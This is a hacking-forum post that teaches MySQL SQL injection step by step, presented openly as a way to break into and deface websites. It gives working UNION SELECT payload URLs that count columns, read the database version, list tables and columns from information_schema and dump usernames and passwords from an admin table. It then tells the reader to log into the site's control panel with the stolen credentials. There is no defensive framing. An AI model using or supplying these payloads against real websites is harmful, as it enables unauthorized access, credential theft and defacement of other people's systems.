Structured Query Language Injection Tutorial (Mysql)

No replies
alcohologist
alcohologist's picture
Offline
SX Crew
Joined: 2010/11/22

Introduction:

Sqli (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites and obviously on defacing them. It is easily done and it is a great starting off point.Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

How is it done:

First, you need to find an sqli vulnerabel site for example:
http://www.example.com/index.php?id=3

To check that it is vulnerable all you have to do is put a ' at the end of the url. So now your url should look like this:
http://www.example.com/index.php?id=3'

Press enter and you get some kind of error. The errors will vary but it should look something like this
http://i982.photobucket.com/albums/ae308/blink1337/1.png

or it would display like this: mysql error syntax.....

If an error happends that site is vulerable! Now we can start or proper injection...hehehhe.LOL

Getting Number of Columns

After finding your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is use the statement "order by". All you have to do is put ORDER BY (number)
at the end of your url. So it should look like this:

http://www.example.com/index.php?id=3 order by 1

You should start with order by 1 and keep increasing the number by 1 until you get an error.

It should look like this:
http://www.example.com/index.php?id=3 order by 1
http://www.example.com/index.php?id=3 order by 2
http://www.example.com/index.php?id=3 order by 3
http://www.example.com/index.php?id=3 order by 4
http://www.example.com/index.php?id=3 order by 5
http://www.example.com/index.php?id=3 order by 6

If you get an error at the 7th order, then there are only 6 columns for you to insert for the command union select all.

Finding Acsessable Columns

Now that we have the number of columns we need to get the column numbers that we can grab information from.We do this by by using the "Union" "select" and Number of columns. You put them together in your url like this: (Put "-" after the string "=")

http://www.example.com/index.php?id=-3 union select 1,2,3,4,5,6

After you do that you should get something like this...
http://i982.photobucket.com/albums/ae308/blink1337/3.png

The page should look a bit messed up and there should be 2 numbers or more on the page(That depend actually). These numbers are the column numbers we can get information from. We will replace them with statements later on so write them down or remember them.

Finding MySQL Database Version
Put @@version on the desired numbers for example you choose no. 1

http://www.example.com/index.php?id=-3 union select @@version,2,3,4,5,6

Press enter and now the page should display the database number.
http://i982.photobucket.com/albums/ae308/blink1337/4.png

Now the number that we had in the first step will be replaced with the database number. As it shows above. The site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on this site.

Finding the Tables
Next we are going to inject the website to find the table names. We do this by replacing @@version with "group_concat(table_name)" and also add "+from+information_schema.tables+where+table_schema=database()--" after the last number in our url.

http://www.example.com/index.php?id=-3 union select all group_concat(table_name),2,3,4,5,6+from information_schema.tables+where+ table_schema=database()--

The page should now show the Table names. You may want to write them down.
http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png

Finding Column Names

This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns
So your url should look like.

http://www.example.com/index.php?id=-3 union select all group_concat(column_name),2,3,4,5,6+from information_schema.columns+where+ table_schema=database()--

Now, the page should display the following column names; password, username, email, name, id, date created, last login, etc. ( Once again it depends)

Getting Information

Now that we have the database name, table names, and column names we can put them together and pull information from them. To do to this we need to put the following in our url.

The column names should be inserted in the group_concat() section and table_name should be inserted after the from, therefore you should omit the +from+information_schema.columns+where+table_schema=database()-- just like this:

This is the last part of the code:
http://www.example.com/index.php?id=-3 union select group_concat(username,0x3a,password),2,3,4,5,6+from+admin

(NOte: 0x3a is used as a separator)
Then poof you just got the login name and the password...All you need to do is to find the admin cpanel and login the required information.

>Images and some guides = courtesy of blink
>tut and codes revised by ME,scryptzO

I'm just noob but I do know this......

.(....\............../....)
. \....\........... /..../
...\....\........../..../
....\..../´¯.I.¯`\./
..../... I....I..(¯¯¯`\
...I.....I....I...¯¯.\...\
...I.....I´¯.I´¯.I..\...)
...\.....` ¯..¯ ´.......'
....\_________.·´

~o ~o ~o